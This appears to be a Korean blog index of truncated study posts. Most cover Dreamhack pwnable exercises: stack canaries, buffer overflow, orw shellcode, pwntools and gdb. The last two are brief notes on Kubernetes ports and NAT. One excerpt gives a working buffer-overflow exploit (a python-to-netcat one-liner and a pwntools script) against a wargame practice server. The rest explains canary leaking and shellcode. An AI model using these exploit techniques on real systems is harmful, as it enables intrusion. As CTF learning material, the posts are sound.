checksec ./파일실행명 # 해당 파일에 적용된 보호기법들을 보여준다. pwntools 설치하면 실행 가능 카나리가 적용되어 있는 것을 확인 #include #include int main() { char buf[0x50]; printf("Address of the buf: %p\n", buf); printf("Distance between buf and $rbp: %ld\n", (char*)__builtin_frame_address(0) - buf); //byte printf("[1] Leak the canary\n"); printf("Input: "); fflush(stdout); read(0, buf, 0x100); printf("Your input is '%s'\n", buf); puts("..

오늘은 스택 카나리에 대해 공부를 할 것이다! 스택카나리란? - 스택 버퍼 오버플로우로부터 반환 주소를 보호하는 보호기법 - 스택 카나리는 함수의 프롤로그에서 스택 버퍼와 반환 주소 사이에 임의의 값을 삽입하고, 함수의 에필로그에서 해당 값의 변조를 확인하는 보호 기법이다. 카나리 값의 변조가 확인되면 프로세스는 강제로 종료된다!@! fs? -> TLS(Thread Local Storage)에 카나리를 비롯하여 프로세스 실행에 필요한 여러 데이터가 저장된다고만 일단 알고 있자 Ex) 예를 들어 buf[8]을 read하는 함수에 대해 스택버퍼오버플로우 공격을 진행할 경우 rbp-8 에 저장된 카나리와 fs:0x28 에 저장된 카나리를 xor해서 연산 결과가 0이면 je 성공으로 정상 반환! 결과가 다른 경..

피곤한데 열심히 놀았으니까 양심상 일단 한문제 풀고자려구,,, Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 환경은 다음과 같다. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void read_flag() ..

pwnable 초보인 나에게는 어려운 문제였다.. 원격 서버 환경은 이러하다 Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 우선 32bit 환경이기 때문에 스택프레임구조는 buf(n) | sfp(4) | ret(4) 요러하다. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL..

Host: host1.dreamhack.games Port: 10469/tcp 1. python 공격 코드 이용 (python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469 2. pwntools 이용 from pwn import * p = remote('host1.dreamhack.games',10469) # 원격 서버 대상으로 익스플로잇 수행 context.arch="amd64" # x86-64 payload = 'A' * 0x30 payload += 'B' * 0x08 payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_..

스택 오버플로우 VS 스택 버퍼 오버플로우 스택 오버플로우 : 스택영역이 너무 많이 확장돼서 발생하는 버그 스택 버퍼 오버플로우 : 스택에 위치한 버퍼에 버퍼의 크기보다 많은 데이터가 입력되어 발생하는 버그 (스택의 버퍼에서 발생하는 오버플로우) 버퍼(buffer)란? 데이터가 목적지로 이동되기 전에 보관되는 임시 저장소 스택 버퍼 : 스택에 있는 지역변수 힙 버퍼 : 힙에 할당된 메모리 영역 Ex1) 데이터 변조 - 버퍼 오버플로우로 인해 뒤의 데이터 값을 변조시킬 수 있다. Ex2) 데이터 유출 c언어에서 문자열의 끝을 null로 인식하는데 버퍼 오버플로우를 통해 null을 없애주면 뒤의 데이터까지 함께 읽는 것이 가능해진다. Ex3) 실행흐름조작 예를 들면 함수의 ret에 자신이 실행하고 싶은 명령..

셸코드란? -> 익스플로잇을 위해 제작된 어셈블리 코드 조각 일반적으로 셸을 획득하는 것이 목적! 어셈블리어로 이루어져있음 Ex) 해커가 rip를 자신이 작성한 셸코드로 옮기면 해커가 원하는 어셈블리 코드를 실행할 수 있음 orw 셸코드 작성 - 파일을 열고 읽은 뒤 화면에 출력해주는 셸코드! /** * /tmp/flag를 읽는 셸코드 */ char buf[0x30]; int fd = open("/tmp/flag", RD_ONLY, NULL); read(fd, buf, 0x30); // 파일 읽고 buf에 저장 write(1, buf, 0x30); // buf 에 있는 값 write 위는 우리가 만들 셸 코드의 c언어 의사코드 1. int fd = open(“/tmp/flag”, O_RDONLY, NUL..

1. process & remote - process : 익스플로잇을 로컬 바이너리를 대상으로 할 때 사용하는 함수 (테스트 & 디버깅 용) - remote : 원격 서버를 대상으로 할 때 사용 (서버를 실제 공격하기 위함) from pwn import * p = process('./test') #로컬 바이너리 'test'를 대상으로 익스플로잇 수행 p = remote('example.com',31337) #'example.com'의 31337 포트에서 실행 중인 프로세스를 대상으로 익스플로잇 수행 2. send - send : 데이터를 프로세스에 전송하기위해 사용 from pwn import * p = process('./test') p.send('A') # ./test에 'A'를 입력 p.sendli..

gdb는 리눅스의 대표적인 디버거중 하나! ELF - 리눅스 실행 파일 형식 - 크게 헤더와 여러 형식으로 이루어짐 --> ELF 의 헤더에 진입점(EP) 필드 존재 (OS는 ELF를 실행할 때 EP부터 프로그램 실행) //해당 명령어를 통해 진입점 확인 가능 //entry point address readelf -h debugee(파일명) entry point address : 0x1060 gdb에서 start 명령어를 입력하면 진입점 주소를 rip가 가리키고 있는 것을 볼 수 있다. gdb (gdb) start 1. registers : 레지스터의 상태를 보여줌 2. disasm : rip부터 여러줄에 걸쳐 디스어셈블(기계어 -> 어셈블리)된 결과를 보여줌 3. stack : rsp부터 여러줄에 걸쳐..

dreamhack을 통해 공부한 내용을 정리한 포스트입니다. 피연산자 종류 - 상수 - 레지스터 - 메모리 (BYTE(1), WORD(2), DWORD(4), QWORD(8)) 데이터의 이동 - MOV a, b => b에 있는 값을 a에 대입 - LEA a,b => b의 주소값을 a에 대입 EX) mov eax, dword ptr ss:[ebp-4] 의 경우에는 [ebp-4]가 하나의 주소로 해당 주소의 값을 eax에 대입한다. lea eax, dword ptr ss:[ebp-4] 의 경우에는 mov eax, ebp 후에 sub eax,4 를 하는 것과 같다. +) [ ] 기호는 주소의 참조값을 의미하며 [ ] 안에서 주소의 사칙 연산이 이루어진다. 산술연산 - add a,b => a= a+b - sub..

NodePort : 외부에서 접속하기 위해 사용하는 port Port : Cluster 내부에서 사용할 Service 객체의 포트 TargetPort : Service객체로 전달된 요청을 Pod(deployment)로 전달할때 사용하는 포트(즉 pod의 port?인듯) 즉, HTTP -> NodePort -> Port -> TargetPort 외부에서 접근하기 위해서는 external ip:port 를 입력해야함 +) service - Cluster ip - NodePort - LoadBalancer 브라우저가 LoadBalancer에 요청 보내면 알아서 살아있는 Node 에 접근?? 하는듯 [출처] https://m.blog.naver.com/PostView.naver?isHttpsRedirect=tr..

** 가상머신 공부를 위한 포스트 ! NAT - 사설 네트워크 주소(Ex) 가상머신 내부 네트워크)를 사용하는 망에서 외부 공인 네트워크와의 통신을 위해서 네트워크 주소를 변환하는 것 - 가상머신 네트워크에서 일반적으로 설정되어있음 - 도커 컨테이너도 마찬가지로 기본적으로 NAT 환경 구성 - 내부 -> 외부 접근 가능 O - 외부 -> 내부 접근 불가 X - 디폴트 게이트웨이를 통해 외부와 통신이 가능! - 공유기도 마찬가지(내부적으로 사설 ip를 가지고 있지만 기본 게이트웨이에서 공인 ip로 변경된 후 웹서버에 전송됨) 출처: https://technote.kr/213